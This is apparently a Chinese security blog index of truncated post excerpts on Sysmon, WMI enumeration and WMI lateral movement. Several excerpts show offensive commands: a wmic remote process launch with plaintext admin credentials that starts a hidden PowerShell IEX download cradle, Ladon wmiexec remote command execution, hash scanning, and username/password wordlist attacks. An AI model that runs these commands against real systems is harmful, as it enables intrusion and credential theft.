摘要:
注意:Sysmon是微软对于Eventlog的补充解决⽅案,这是笔者对于Sysmon的理解,Sysmon可以能够获取到 Evenlog获取不到的更多信息; sysmon64.exe -i exampleSysmonConfig.xml //执⾏安装: sysmon64.exe -u //删除 执⾏安 阅读全文
摘要:
wmic /NODE:192.168.8.180 /user:"administrator" /password:"win@123" PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webcli 阅读全文
摘要:
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share #共享 Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile #⽂件/⽬录列表 Get-WmiObject -Namespace R 阅读全文
摘要:
注意:wmic命令需要本地管理员或域管理员才可以进⾏正常使⽤,普通权限⽤户若想要使⽤wmi,可以修改 普通⽤户的ACL,不过修改⽤户的ACL也需要管理员权限,这⾥笔者单独罗列⼩结:普通⽤户使⽤wmic。以下 命令均在2008R2、2012R2、2016上进⾏测试,部分命令在虚拟机中测试不⾏,例如查询 阅读全文
摘要:
###在⼯作组尝试执⾏命令 ladon.exe wmiexec2 192.168.8.192 Administrator win@123 cmd whoami ###在域内尝试执⾏命令 ladon.exe wmiexec2 10.10.0.10 test1\Administrator win@123 阅读全文
摘要:
ladon.exe wmiexec 192.168.8.192 Administrator win@123 cmd whoami 阅读全文
摘要:
ladon.exe 192.168.8.192 WmiHashScan 阅读全文
摘要:
使用工具:ladon 注意:请提前在ladon.exe⽬录下准备好user.txt和pass.txt。 阅读全文